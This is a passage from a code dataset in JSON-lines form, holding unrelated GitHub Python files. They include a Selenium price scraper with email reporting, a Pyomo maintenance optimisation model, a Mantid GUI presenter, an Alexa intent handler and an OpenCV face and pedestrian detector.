for dir_path in experiment_dir_paths:\n experiment_data = experiment_data.append(get_experiment_data(dir_path))\n return experiment_data\n\n\nif __name__ == \"__main__\":\n test = get_experiment_data(\"/home/robocup/svn/trunk/src/Turtle2/Strategy/src/STP/strategy_learner/experiments/results/11-nov-spg-1\")\n print(test)\n","repo_name":"mickeybeurskens/strategy-learner","sub_path":"evaluation/load_experiments.py","file_name":"load_experiments.py","file_ext":"py","file_size_in_byte":7644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"9939402889","text":"######################################################\n# Imports\n######################################################\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport jellyfish\n\nfrom flask import Flask, render_template, request\nimport time\n\nimport yagmail\nimport os\n\n\nservice = Service('path') # path to chromedriver for local machine\n\n######################################################\n# web scraping functions\n######################################################\n\ndef clean_price_rtv(text):\n return float(text.split(\" zł\")[0].replace(' ', ''))\n\ndef clean_price_media(text):\n return float(text.replace('\\u202f', ''))\n\n# function below extracts the minimum price from prices lower than maximum price stated in the GUI\n# the similarity ratio of offers and searched product has to be bigger than minimum ratio\n# we are taking into account two highest ratios to avoid rejecting similar item (e.g. just different color) with lower price\n\ndef get_min_price(ratio_list, price_list, threshold, ratio_min):\n if len(ratio_list) > 0 and len(price_list) > 0:\n help_index = [index for index, item in enumerate(price_list) if item <= threshold]\n if help_index != []:\n index = [index for index, item in enumerate(ratio_list) if item >= sorted(ratio_list)[-2] and item > ratio_min and index in help_index]\n min_price = min([price_list[i] for i in index])\n return min_price\n\ndef get_driver(url):\n options = webdriver.ChromeOptions()\n options.add_argument(\"disable-infobars\")\n options.add_argument(\"start-maximized\")\n options.add_argument(\"disable-dev-shm-usage\")\n options.add_argument(\"no-sandbox\")\n options.add_argument(\"--headless=new\")\n options.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\n options.add_argument(\"disable-blink-features=AutomationControlled\")\n\n driver = webdriver.Chrome(service=service, options=options)\n driver.get(url)\n return driver\n\n\ndef rtv_get_results(text, url, threshold):\n driver = get_driver(url)\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.ID, 'onetrust-accept-btn-handler'))).click()\n\n search_bar = driver.find_element(By.XPATH,\n '/html/body/ems-root/eui-root/eui-dropdown-host/div[2]/ems-euro-mobile/ems-euro-mobile-shared-feature-header-wrapper/ems-euro-mobile-shared-feature-header/div/ems-header/div[2]/div/div/div[2]/ems-euro-mobile-shared-feature-search-container/div/div/ems-search-input/ems-text-input/label/div/div/div[1]/input')\n\n search_bar.click()\n search_bar.send_keys(text + Keys.RETURN)\n\n expected = (By.CLASS_NAME, 'box-medium__link')\n WebDriverWait(driver, 10).until(EC.presence_of_element_located(expected))\n offers = driver.find_elements(By.CLASS_NAME, \"box-medium__link\")\n prices = driver.find_elements(By.CLASS_NAME, \"price__value\")\n\n offer_list = []\n ratio_list = []\n link_list = []\n\n for offer in offers:\n offer_list.append(offer.text)\n link_list.append(offer.get_attribute('href'))\n ratio_list.append(jellyfish.jaro_winkler_similarity(text, offer.text))\n\n price_list = []\n\n for price in prices:\n if not \",\" in price.text and not price.text == \"\":\n price_list.append(clean_price_rtv(price.text))\n\n min_price = get_min_price(ratio_list, price_list, threshold, 0.5)\n\n driver.quit()\n\n if offer_list == []:\n return \"No offers found\"\n else:\n if min_price:\n price_index = price_list.index(min_price)\n return offer_list[price_index], min_price, link_list[price_index]\n else:\n return \"Prices too high\"\n\n\ndef media_get_results(text, url, threshold):\n driver = get_driver(url)\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.ID, 'onetrust-accept-btn-handler'))).click()\n\n search_bar = driver.find_element(By.XPATH,\n '/html/body/div[1]/div[2]/header[2]/div[2]/div/div/div[2]/div/form/div[1]/input')\n\n search_bar.click()\n search_bar.send_keys(text + Keys.RETURN)\n\n expected = (By.CLASS_NAME, 'box')\n WebDriverWait(driver, 10).until(EC.presence_of_all_elements_located(expected))\n time.sleep(2)\n\n offers = driver.find_elements(By.CLASS_NAME, \"box\")\n links = driver.find_elements(By.CSS_SELECTOR, \"h2.name.is-section>a\")\n prices = driver.find_elements(By.CLASS_NAME, \"whole\")\n\n offer_list = []\n ratio_list = []\n link_list = []\n\n for offer in offers:\n offer_list.append(offer.text)\n ratio_list.append(jellyfish.jaro_winkler_similarity(text, offer.text))\n\n for link in links:\n link_list.append(link.get_attribute(\"href\"))\n\n price_list = []\n\n for price in prices:\n if not \",\" in price.text and not price.text == \"\":\n price_list.append(clean_price_media(price.text))\n\n min_price = get_min_price(ratio_list, price_list, threshold, 0.5)\n\n driver.quit()\n\n if offer_list == []:\n return \"No offers found\"\n else:\n if min_price:\n price_index = price_list.index(min_price)\n return offer_list[price_index], min_price, link_list[price_index]\n else:\n return \"Prices too high\"\n\n######################################################\n# email sending functions\n######################################################\n\n\ndef results_to_html_list(webpage, input):\n if type(input) != str:\n my_string = \"\"\"
\"\"\".format(webpage)\n return my_string\n\n\ndef send_email(sender, receiver, subject, results_list):\n\n email_list = []\n\n for result in results_list:\n email_list.append(results_to_html_list(result[0], result[1]))\n\n contents = \"\"\"\n
Hi! \n Below please find the results of your search:
\n
\n {0}\n
\n
KR, \n Your Python code
\n \"\"\".format(' '.join(email_list))\n\n yag = yagmail.SMTP(user=sender, password=os.getenv('secret_key'))\n yag.send(to=receiver, subject=subject, contents=contents)\n\n\n######################################################\n# Flask app\n######################################################\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return render_template('./index.html',\n status=\" hidden\",\n results_rtv=(str(), str(), str()),\n results_media=(str(), str(), str()),)\n\n\n@app.route('/', methods=['POST'])\ndef home_post():\n\n price = float(request.form['price-name'])\n email = str(request.form['email-name'])\n product = str(request.form['product-name'])\n\n results_rtv = rtv_get_results(product, \"https://www.euro.com.pl/\", price)\n results_media = media_get_results(product, \"https://www.mediaexpert.pl/\", price)\n\n if type(results_rtv) == str and type(results_media) == str:\n final_text = \"No results to send via email.\"\n else:\n final_text = \"The results were also sent to the provided email.\"\n results_list = [[\"RTV EURO AGD\", results_rtv], [\"Media Expert\", results_media]]\n send_email('sender email', email, \"RTV product finder results\", results_list)\n\n if type(results_rtv) == str:\n results_rtv = (results_rtv, str(), str())\n\n if type(results_media) == str:\n results_media = (results_media, str(), str())\n\n return render_template('index.html',\n status=\" \",\n price_max=price,\n product=product,\n email=email,\n final_text=final_text,\n results_rtv=results_rtv,\n results_media=results_media)\n\n\napp.run(host='0.0.0.0')\n","repo_name":"kp-muszynski/RTV-web-scraping","sub_path":"web_scraping.py","file_name":"web_scraping.py","file_ext":"py","file_size_in_byte":8299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"12006893918","text":"# dp[1] = 1\n# dp[2] = 2: 2번 카드 1개, 1번 카드 2개를 쓰는 것 중 큰 수 이다.\n# dp[3] = 3: 3번 카드 1개, 1과 dp[2]를 쓰는 것 중 큰 수이다. 여기서 1,1,1로 3을 만드는 경우, 1,2로 3을 만드는 경우는 dp[2]에서 처리가 끝난 것\n# dp[n] = n: n번 카드 1개 or 1과 dp[n-1] or dp[2]와 dp[n-2], ..dp[i]와 dp[n-i] 중 max\n\nn = int(input())\nprices = list(map(int, input().split()))\nprices.insert(0, 0)\n\ndp = [0] * (n+1)\ndp[0] = 0\ndp[1] = prices[1]\ndp[2] = max(prices[2], dp[1] + prices[1])\n\nfor i in range(3, n+1):\n dp[i] = prices[i]\n for j in range(1, i):\n dp[i] = max(dp[i], dp[j] + dp[i-j])\n\nprint(dp[-1])\n","repo_name":"plibi/codingtest","sub_path":"BOJ/11052.py","file_name":"11052.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"7712322366","text":"from mantidqtinterfaces.Muon.GUI.Common.corrections_tab_widget.dead_time_corrections_model import DeadTimeCorrectionsModel\nfrom mantidqtinterfaces.Muon.GUI.Common.corrections_tab_widget.dead_time_corrections_view import DeadTimeCorrectionsView\nfrom mantidqtinterfaces.Muon.GUI.Common.utilities.load_utils import get_table_workspace_names_from_ADS, load_dead_time_from_filename\n\n\nclass DeadTimeCorrectionsPresenter:\n \"\"\"\n The DeadTimeCorrectionsPresenter has a DeadTimeCorrectionsView and DeadTimeCorrectionsModel.\n \"\"\"\n\n def __init__(self, view: DeadTimeCorrectionsView, model: DeadTimeCorrectionsModel, corrections_presenter):\n \"\"\"Initialize the DeadTimeCorrectionsPresenter. Sets up the slots and event observers.\"\"\"\n self.view = view\n self.model = model\n self._corrections_presenter = corrections_presenter\n\n self.view.set_slot_for_dead_time_from_selector_changed(self.handle_dead_time_from_selector_changed)\n self.view.set_slot_for_dead_time_workspace_selector_changed(self.handle_dead_time_workspace_selector_changed)\n self.view.set_slot_for_dead_time_file_browse_clicked(self.handle_dead_time_browse_clicked)\n\n def initialize_model_options(self) -> None:\n \"\"\"Initialise the model with the default fitting options.\"\"\"\n self.model.set_dead_time_source_to_from_file()\n\n def handle_ads_clear_or_remove_workspace_event(self, _: str = None) -> None:\n \"\"\"Handle when there is a clear or remove workspace event in the ADS.\"\"\"\n if self.model.is_dead_time_source_from_data_file():\n self.view.set_dead_time_from_data_file_selected()\n elif self.model.is_dead_time_source_from_workspace():\n self.view.set_dead_time_from_workspace_selected()\n\n def handle_instrument_changed(self) -> None:\n \"\"\"User changes the selected instrument.\"\"\"\n self.model.set_dead_time_source_to_from_file()\n self.view.set_dead_time_from_data_file_selected()\n\n def handle_run_selector_changed(self) -> None:\n \"\"\"Handles when the run selector is changed.\"\"\"\n if self.model.is_dead_time_source_from_data_file():\n self.model.set_dead_time_source_to_from_file()\n self.update_dead_time_info_text_in_view()\n\n def handle_dead_time_from_selector_changed(self) -> None:\n \"\"\"Handles when the location where the dead time should be retrieved from changes.\"\"\"\n if self.view.is_dead_time_from_data_file_selected():\n self._handle_dead_time_from_data_file_selected()\n self._set_dead_time_widgets_visible(False, False)\n elif self.view.is_dead_time_from_workspace_selected():\n self._handle_dead_time_from_workspace_selected()\n self._set_dead_time_widgets_visible(True, False)\n elif self.view.is_dead_time_from_other_file_selected():\n self._handle_dead_time_from_none_selected()\n self._set_dead_time_widgets_visible(False, True)\n else:\n self._handle_dead_time_from_none_selected()\n self._set_dead_time_widgets_visible(False, False)\n\n def _handle_dead_time_from_data_file_selected(self) -> None:\n \"\"\"Handles when the dead time from data file is initially selected.\"\"\"\n self.set_dead_time_source_to_from_file()\n\n def _handle_dead_time_from_workspace_selected(self) -> None:\n \"\"\"Handles when the dead time from workspace is initially selected.\"\"\"\n self.view.populate_dead_time_workspace_selector(get_table_workspace_names_from_ADS())\n self.set_dead_time_source_to_from_ads()\n\n def _handle_dead_time_from_none_selected(self) -> None:\n \"\"\"Handles when the dead time is none is initially selected.\"\"\"\n self.set_dead_time_source_to_none()\n\n def handle_dead_time_workspace_selector_changed(self) -> None:\n \"\"\"The user changes the selected Table Workspace to use as dead time.\"\"\"\n table_name = self.view.selected_dead_time_workspace()\n if table_name == \"None\" or table_name == \"\":\n self._handle_dead_time_from_none_selected()\n else:\n error = self.model.validate_selected_dead_time_workspace(table_name)\n if error == \"\":\n self.set_dead_time_source_to_from_ads()\n else:\n self.view.set_selected_dead_time_workspace(\"None\")\n self._handle_selected_table_is_invalid()\n self._corrections_presenter.warning_popup(error)\n\n def _handle_selected_table_is_invalid(self) -> None:\n \"\"\"Handles when the selected dead time table workspace is invalid.\"\"\"\n # Triggers handle_dead_time_from_selector_changed\n self.view.set_dead_time_from_data_file_selected()\n\n def handle_dead_time_browse_clicked(self) -> None:\n \"\"\"User selects the option to Browse for a nexus file to load dead times from.\"\"\"\n filename = self.view.show_file_browser_and_return_selection([\"nxs\"], [\"\"], multiple_files=False)[0]\n if filename != \"\":\n name = self._load_file_containing_dead_time(filename)\n if name is not None:\n self.view.populate_dead_time_workspace_selector(get_table_workspace_names_from_ADS())\n error = self.model.validate_selected_dead_time_workspace(name)\n if error == \"\":\n self.view.switch_to_using_a_dead_time_table_workspace(name)\n else:\n self._corrections_presenter.warning_popup(error)\n\n def handle_pre_process_and_counts_calculated(self) -> None:\n \"\"\"Handles when MuonPreProcess and counts workspaces have been calculated.\"\"\"\n self.update_dead_time_info_text_in_view()\n\n def update_dead_time_info_text_in_view(self) -> None:\n \"\"\"Update the dead time info label in the view.\"\"\"\n if self.model.is_dead_time_source_from_data_file() or self.model.is_dead_time_source_from_workspace():\n self.view.set_dead_time_average_and_range(\n self._corrections_presenter.current_run_string(), self.model.dead_times_range(), self.model.dead_times_average()\n )\n else:\n self.view.set_dead_time_info_text(\"No dead time correction\")\n\n def set_dead_time_source_to_from_file(self) -> None:\n \"\"\"Sets the dead time source to be from the data file and notifies the GUI to recalculate the corrections.\"\"\"\n self.model.set_dead_time_source_to_from_file()\n self._notify_perform_dead_time_corrections()\n\n def set_dead_time_source_to_from_ads(self) -> None:\n \"\"\"Sets the dead time source to be the ADS and notifies the GUI to recalculate the corrections.\"\"\"\n self.model.set_dead_time_source_to_from_ads(self.view.selected_dead_time_workspace())\n self._notify_perform_dead_time_corrections()\n\n def set_dead_time_source_to_none(self) -> None:\n \"\"\"Sets the dead time source to be none and notifies the GUI to recalculate the corrections.\"\"\"\n self.model.set_dead_time_source_to_none()\n self._notify_perform_dead_time_corrections()\n\n def _set_dead_time_widgets_visible(self, workspace_mode_visible: bool, other_file_mode_visible: bool) -> None:\n \"\"\"Sets which dead time widgets are visible.\"\"\"\n self.view.set_dead_time_workspace_selector_visible(workspace_mode_visible)\n self.view.set_dead_time_other_file_visible(other_file_mode_visible)\n\n def _load_file_containing_dead_time(self, filename: str) -> str:\n \"\"\"Attempts to load a Nexus cycle file containing a dead time table workspace.\"\"\"\n try:\n name = load_dead_time_from_filename(filename)\n except Exception:\n self._corrections_presenter.warning_popup(\n \"The file provided has an unexpected format. The file should be \" \"of the same instrument and cycle as the raw data.\"\n )\n return None\n\n if name == \"\":\n self._corrections_presenter.warning_popup(\"The file provided does not contain dead time data.\")\n return None\n return name\n\n def _notify_perform_dead_time_corrections(self) -> None:\n \"\"\"A notification event to trigger the calculation of the dead time corrections.\"\"\"\n self._corrections_presenter.disable_editing_notifier.notify_subscribers()\n self._corrections_presenter.perform_corrections_notifier.notify_subscribers()\n self._corrections_presenter.enable_editing_notifier.notify_subscribers()\n","repo_name":"mantidproject/mantid","sub_path":"qt/python/mantidqtinterfaces/mantidqtinterfaces/Muon/GUI/Common/corrections_tab_widget/dead_time_corrections_presenter.py","file_name":"dead_time_corrections_presenter.py","file_ext":"py","file_size_in_byte":8433,"program_lang":"python","lang":"en","doc_type":"code","stars":199,"dataset":"github-code","pt":"39"}
+{"seq_id":"11735922080","text":"import appdaemon.plugins.hass.hassapi as hass\nimport random\n\nclass woIsSomeoneIntent(hass.Hass):\n\n def initialize(self):\n return\n\n def getIntentResponse(self, slots, devicename):\n try:\n ############################################\n # an example Intent to show how you can change text\n # based on sensor states or time\n ############################################\n if self.slots[\"person\"] in self.args[\"household\"]:\n ############################################\n # decide if a person is guest or not\n ############################################\n if self.get_state(\"sensor.\" + self.slots[\"person\"]) == \"In bed\":\n ############################################\n # assumes that there are sensors for every person \n # with a state if thet are in Bed\n ############################################\n text = self.random_arg(self.args[\"inBed\"])\n elif self.get_state(\"sensor.kellertime\") == \"ja\":\n ############################################\n # assumes that there is a sensor thats set to \"ja\"\n # for a certain event\n ############################################\n text = self.random_arg(self.args[\"kellerTime\"])\n elif self.now_is_between(\"18:00:00\",\"18:30:00\"):\n ############################################\n # at dinertime give another text\n ############################################\n text = self.random_arg(self.args[\"diner\"])\n elif self.slots[\"person\"] == \"olinde\":\n if self.now_is_between(\"16:00:00\",\"17:30:00\"):\n ############################################\n # text for a certain person at a certain time\n ############################################\n text = self.random_arg(self.args[\"Olinde\"][\"couch\"])\n elif self.now_is_between(\"17:30:00\",\"18:00:00\"):\n ############################################\n # text for a certain person at a certain time\n ############################################\n text = self.random_arg(self.args[\"Olinde\"][\"cooking\"])\n else:\n text = self.random_arg(self.args[\"Olinde\"][\"somethingElse\"])\n elif self.slots[\"person\"] == \"rene\":\n if self.now_is_between(\"19:00:00\",\"20:00:00\"):\n ############################################\n # text for a certain person at a certain time\n ############################################\n text = self.random_arg(self.args[\"Rene\"][\"couch\"])\n else:\n text = self.random_arg(self.args[\"Rene\"][\"somethingElse\"])\n else:\n text = self.random_arg(self.args[\"Other\"][\"somethingElse\"])\n else:\n text = self.random_arg(self.args[\"Other\"][\"somethingElse\"])\n except: \n text = self.args[\"Error\"]\n return text\n\n def random_arg(self,argName):\n ############################################\n # pick a random text from a list\n ############################################\n if isinstance(argName,list):\n text = random.choice(argName)\n else:\n text = argname\n return text\n","repo_name":"ReneTode/Alexa-Appdaemon-App","sub_path":"apps/internet/alexa/example_intents/woIsSomeone/woIsSomeoneIntent.py","file_name":"woIsSomeoneIntent.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"de","doc_type":"code","stars":10,"dataset":"github-code","pt":"39"}
+{"seq_id":"16667754697","text":"# -*- coding: utf-8 -*-\n# 用于将各专辑文件夹下的歌曲文件搬到同一个文件夹里边, 使用前请把 neteaseMusicPath 改成自己电脑上的路径\n# 特别注意路径末尾的 \\\\\n# zhian.h@qq.com\n# python flat_music.py\n\nimport io\nimport os\nimport sys\nimport shutil\n\nsys.stdout = io.TextIOWrapper(\n sys.stdout.buffer, encoding='utf-8') # 改变标准输出的默认编码\n\nneteaseMusicPath = \"D:\\\\houzhian\\\\Music\\\\iTunes\\\\iTunes Media\\\\Music\\\\\"\noutputPath = \"D:\\\\houzhian\\\\Music\\\\iTunes\\\\iTunes Media\\\\output\\\\\"\n\n\ndef stealFile(path, outputPath):\n for roots, dirs, files in os.walk(path):\n for file in files:\n try:\n shutil.move(os.path.join(roots, file), outputPath)\n print(os.path.join(roots, file))\n except Exception as e:\n print(e)\n pass\n for dir in dirs:\n stealFile(dir, outputPath)\n\n\nif __name__ == '__main__':\n stealFile(neteaseMusicPath, outputPath)\n","repo_name":"jaan-hou/NeteaseCloudMusic-tools","sub_path":"flat_music.py","file_name":"flat_music.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"34489179630","text":"from pyomo.environ import *\nimport numpy as np\n\nmodel = ConcreteModel()\nTT = 5#5\nmodel.T = RangeSet(0, TT-1) # time periods\n\n# i0 = 5.0 # initial inventory\n# c = 4.6 # setup cost\n# h_pos = 0.7 # inventory holding cost\n# h_neg = 1.2 # shortage cost\n# P = 5.0 # maximum production amount\n# # demand during period t\n# d = {1: 5.0, 2:7.0, 3:6.2, 4:3.1, 5:1.7}\n\nn_condition = 3\nn_operation = 3\nmodel.n_condition = RangeSet(0, n_condition-1)\nmodel.n_operation = RangeSet(0, n_operation-1)\n\n\nN = 1000\n\ns0 = [0.25, 0.7, 0.05]\n\ncon1_m_performance = np.asarray([[1, 0, 0], [1, 0, 0], [0.99, 0.01, 0]])\ncon2_m_performance = np.asarray([[0, 1, 0], [0.5, 0.5, 0], [0.99, 0.01, 0]])\ncon3_m_performance = np.asarray([[0, 0, 1], [0.1, 0.3, 0.6], [0.99, 0.01, 0]])\ncon_m_performance = np.zeros([n_condition, n_operation, n_condition])\ncon_m_performance[0, :] = con1_m_performance\ncon_m_performance[1, :] = con2_m_performance\ncon_m_performance[2, :] = con3_m_performance\n\ndegradeP = np.asarray([[0.7, 0.3, 0], [0, 0.8, 0.2], [0, 0, 1]])\nmaintenance_cost = np.asarray([[0, 0, 0], [30, 50, 100], [500, 500, 1000]])\n\n# define the variables\n#model.y = Var(model.T, domain=Binary)\n#model.x = Var(model.T, domain=NonNegativeReals)\nmodel.x = Var(RangeSet(TT), RangeSet(n_condition * (n_operation - 1)), initialize=0.6, bounds=(0, 1)) #action\n#model.x = Set(initialize=1.01*np.zeros([model.T, (n_condition * (n_operation - 1))]), domain=NonNegativeReals, bounds = (0, 1), ordered = True) #action\nmodel.u = Var(RangeSet(TT),RangeSet(n_condition * n_operation), initialize = 0, within=NonNegativeReals) #action\n#model.s = Var(RangeSet(TT), RangeSet(n_condition), domain=NonNegativeReals) #state\nmodel.costi = Var(RangeSet(TT), initialize=0, domain=NonNegativeReals) #cost\nmodel.ii = Var(RangeSet(TT), RangeSet(n_condition), initialize = 0, domain=NonNegativeReals)\nmodel.iii = Var(RangeSet(TT), initialize = 0, domain=NonNegativeReals)\n#model.aa = Var(RangeSet(1), domain=NonNegativeReals)\n\n\nuu = np.zeros(TT * n_operation * n_condition)\nss0 = np.zeros([TT + 1, n_condition])\nss0[0, :] = s0\n\n#constraint\ndef time_action(m, t):\n #print(t)\n for tj in m.n_condition:\n #print(tj)\n aa = 0\n for tk in m.n_operation:\n #print(tk)\n if tk == 0:\n uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])] = \\\n value(m.x[t + 1, tj * (n_operation - 1) + tk + 1])\n m.u[t + 1, tj * n_operation + tk + 1] = \\\n value(m.x[t + 1, tj * (n_operation - 1) + tk + 1])\n aa += uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])]\n\n if tk < n_operation - 1 and tk > 0:\n uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])] = \\\n (m.x[t + 1, tj * (n_operation - 1) + tk + 1].value) * (1 - aa)\n m.u[t + 1, tj * n_operation + tk + 1] = \\\n (m.x[t + 1, tj * (n_operation - 1) + tk + 1].value) * (1 - aa)\n aa += uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])]\n\n if tk == n_operation - 1:\n uu[np.ravel_multi_index([t, tj * n_operation + tk], [TT, n_operation * n_condition])] = 1 - aa\n m.u[t + 1, tj * n_operation + tk + 1] = 1 - aa\n\n\n uu0 = uu[t * n_operation * n_condition : (t+1) * n_operation * n_condition]\n\n\n for ti in m.n_condition:\n ss0[t+1, :] += ((ss0[t, ti] * uu0[ti * n_operation : (ti + 1) * n_operation]).dot(con_m_performance[ti, :])).dot(degradeP)\n m.costi[t + 1] = value(m.costi[t + 1]) + N * uu0[ti * n_operation : (ti + 1) * n_operation].dot(maintenance_cost[:, ti])\n \n if ss0[t+1, n_condition-1] > 0.05:\n m.costi[t + 1] = value(m.costi[t + 1]) + 1e15\n \n for j in range(n_condition):\n m.ii[t+1, j+1] = ss0[t+1, j]\n\n return m.ii[t+1, n_condition] == ss0[t+1, n_condition-1]\n\nmodel.action = Constraint(model.T, rule=time_action)\n\n\ndef last_condition(m, t):\n m.iii[t + 1] = m.ii[t+1, n_condition].value\n return m.iii[t + 1] -0.05 <= 0\n\nmodel.last_con = Constraint(model.T, rule=last_condition)\n#model.last_con_ct = Constraint(model.T, rule=last_condition_const)\n\n\n# define the cost function\ndef obj_rule(m):\n return sum(m.costi[ti + 1] for ti in m.T)\n\nmodel.obj = Objective(rule=obj_rule)\n\n# solve the problem\nimport cplex\nimport sys\nsys.path.append('/opt/ibm/ILOG/CPLEX_Studio_Community129/cplex/bin/x86-84_linux')\nsolver = SolverFactory('cplex', executable = \"/opt/ibm/ILOG/CPLEX_Studio_Community129/cplex/bin/x86-64_linux/cplex\")#('glpk')\nsolution = solver.solve(model) #, executable = \"/opt/ibm/ILOG/CPLEX_Studio_Community129/cplex/bin/x86-64_linux/cplex\")\nmodel.action.pprint()\nmodel.last_con.pprint()\n\nfrom pyomo.opt import SolverStatus, TerminationCondition\nif (solution.solver.status == SolverStatus.ok) and (solution.solver.termination_condition == TerminationCondition.optimal):\n print(\"Solution is feasible and optimal\")\n print(\"Objective function value = \", model.obj())\nelif solution.solver.termination_condition == TerminationCondition.infeasible:\n print (\"Failed to find solution.\")\nelse:\n # something else is wrong\n print(str(solution.solver))\n# print the results\nfor t in model.T:\n #print(model.x[2, 3].value)\n print('Period: {0}, Prod. Amount: {1}'.format(t, uu[np.ravel_multi_index([t, 0], [TT, n_operation * n_condition]): (np.ravel_multi_index([t, n_operation * n_condition-1], [TT, n_operation * n_condition])+1)]))","repo_name":"Jueming6/LPRT","sub_path":"pyomo_maintenance.py","file_name":"pyomo_maintenance.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"5820012277","text":"import imutils\r\nimport numpy as np\r\nimport cv2 as cv\r\nfrom imutils.object_detection import non_max_suppression\r\n\r\n\r\nfrom Models.CallProvider import CallProvider\r\nfrom Models.Connections import FramesConnection\r\n\r\n\r\nclass Detector:\r\n __classifier = None\r\n class_detection = \"\"\r\n n_frames = 20\r\n\r\n def getRects(self, frame):\r\n return []\r\n\r\n def showFrame(self, frame):\r\n frame = imutils.resize(frame)\r\n cv.imshow(\"Detector\", frame)\r\n cv.waitKey(1)\r\n\r\n def find(__db_frames):\r\n\r\n # class which permit to save frames\r\n f = FramesConnection()\r\n\r\n # class which call directly the phones of clients in case of detection\r\n cp = CallProvider()\r\n\r\n # variable which\r\n one_shot = True\r\n\r\n # open the cam in read mode\r\n cap = cv.VideoCapture(0, cv.CAP_DSHOW)\r\n # counter of consecutive faces detected in the frames\r\n i = 0\r\n\r\n while True:\r\n ret, frame = cap.read()\r\n\r\n # no frames stop\r\n if not ret:\r\n break\r\n\r\n # transformation from RGB to Gray chanel\r\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n\r\n rect = __db_frames.getRects(frame)\r\n\r\n for (x, y, w, h) in rect:\r\n # put the rectangles in the image\r\n cv.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\r\n # put the text in the frames\r\n cv.putText(frame, __db_frames.class_detection, (x, y - 10), cv.FONT_ITALIC, 0.9, (36, 255, 12), 2)\r\n\r\n # count the number of faces detected\r\n n_face = len(rect)\r\n i += 1\r\n\r\n # reset false positive face\r\n if n_face == 0:\r\n i = 0\r\n\r\n if i > __db_frames.n_frames:\r\n #cp.doCall()\r\n i = 0\r\n\r\n # check if there are faces\r\n is_face = (n_face > 0)\r\n\r\n # post the frames\r\n if is_face and one_shot:\r\n # TODO: find the correct format of frames for mongoDB\r\n f.post(\"face\", is_face)\r\n one_shot = False\r\n\r\n __db_frames.showFrame(frame)\r\n\r\n\r\nclass DetectorFace(Detector):\r\n class_detection = \"Face\"\r\n path_mask = 'rsc/haarcascade_frontalface_default.xml'\r\n\r\n def __init__(self, scale_factor=1.1, min_neighbors=5):\r\n self.__classifier = cv.CascadeClassifier(self.path_mask)\r\n self.scale_factor = scale_factor\r\n self.min_neighbors = min_neighbors\r\n\r\n def getRects(self, frame):\r\n return self.__classifier.detectMultiScale(frame, self.scale_factor, self.min_neighbors)\r\n\r\n\r\nclass DetectorPedestrian(Detector):\r\n class_detection = \"Pedestrian\"\r\n\r\n def __init__(self, win_stride=(4, 4), padding=(8, 8), scale=1.05, probs=None, overlap_thresholding=0.50):\r\n self.__classifier = cv.HOGDescriptor()\r\n self.__classifier.setSVMDetector(cv.HOGDescriptor_getDefaultPeopleDetector())\r\n self.win_stride = win_stride\r\n self.padding = padding\r\n self.scale = scale\r\n self.probs = probs\r\n self.overlap_trasholding = overlap_thresholding\r\n\r\n def getRects(self, frame):\r\n # detect people in the gray frame\r\n rects, _ = self.__classifier.detectMultiScale(frame, winStride=self.win_stride, padding=self.padding,\r\n scale=self.scale)\r\n\r\n # apply non-maxima suppression to the bounding boxes using a\r\n # fairly large overlap threshold to try to maintain overlapping\r\n # boxes that are still people\r\n rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])\r\n pick = non_max_suppression(rects, probs=self.probs, overlapThresh=self.overlap_trasholding)\r\n return pick\r\n","repo_name":"GianfilippoBellin/raspberryPi-faceAlarm","sub_path":"Models/Detectors.py","file_name":"Detectors.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"9388875559","text":"#!/usr/bin/python -u\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom __future__ import print_function\nimport functools\nimport sys\nfrom io import BytesIO\nimport itertools\nimport uuid\nfrom optparse import OptionParser\nimport random\n\nimport six\nfrom six.moves.urllib.parse import urlparse, parse_qs, quote\n\nfrom swift.common.manager import Manager\nfrom swift.common import utils, ring\nfrom swift.common.internal_client import InternalClient, UnexpectedResponse\nfrom swift.common.storage_policy import POLICIES\nfrom swift.common.http import HTTP_NOT_FOUND\n\nfrom swiftclient import client, get_auth, ClientException\n\nfrom test.probe import PROXY_BASE_URL\nfrom test.probe.common import ENABLED_POLICIES\n\nTIMEOUT = 60\n\n\ndef meta_command(name, bases, attrs):\n \"\"\"\n Look for attrs with a truthy attribute __command__ and add them to an\n attribute __commands__ on the type that maps names to decorated methods.\n The decorated methods' doc strings also get mapped in __docs__.\n\n Also adds a method run(command_name, *args, **kwargs) that will\n execute the method mapped to the name in __commands__.\n \"\"\"\n commands = {}\n docs = {}\n for attr, value in attrs.items():\n if getattr(value, '__command__', False):\n commands[attr] = value\n # methods always have a 